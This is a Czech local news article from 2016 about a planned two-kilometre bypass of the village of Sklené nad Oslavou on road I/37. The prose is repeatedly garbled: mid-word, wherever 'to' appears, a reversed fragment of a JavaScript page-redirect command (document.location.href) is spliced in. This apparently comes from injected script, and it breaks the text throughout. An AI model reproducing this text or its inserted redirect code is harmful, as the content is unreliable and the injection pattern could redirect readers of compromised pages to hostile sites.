Rainbow page separator

Státní silnice mezi Žďárem a Bíteší obejde Sklené

Neděle, 17. ledna 2016

Sklené nad Oslavou / Obejít Sklené nad Oslavou by měla v příštích letech mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torová doprava na silnici I/37. Ředitelství silnic a dálnic (ŘSD) ČR v současné době dokončuje přípravy k vybudování dva kilometry dlouhého obchvatu vesnice. Potřebné pozemky jsou vypořádány, zbývá vybrat zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitelskou společnost, přičemž vlastní stavební práce by mohly začít buď ještě le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos, anebo v příštím roce.
O obchvat lidé ve Skleném nad Oslavou, kde frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaná státní silnice prochází středem obce po celé její délce, usilovali dlouhou řadu let. V současné době tam problémy působí především kamionová doprava, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože šoféři čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to „sedmatřicítku“ využívají, aby se na dálnici vyhnuli mýtným branám.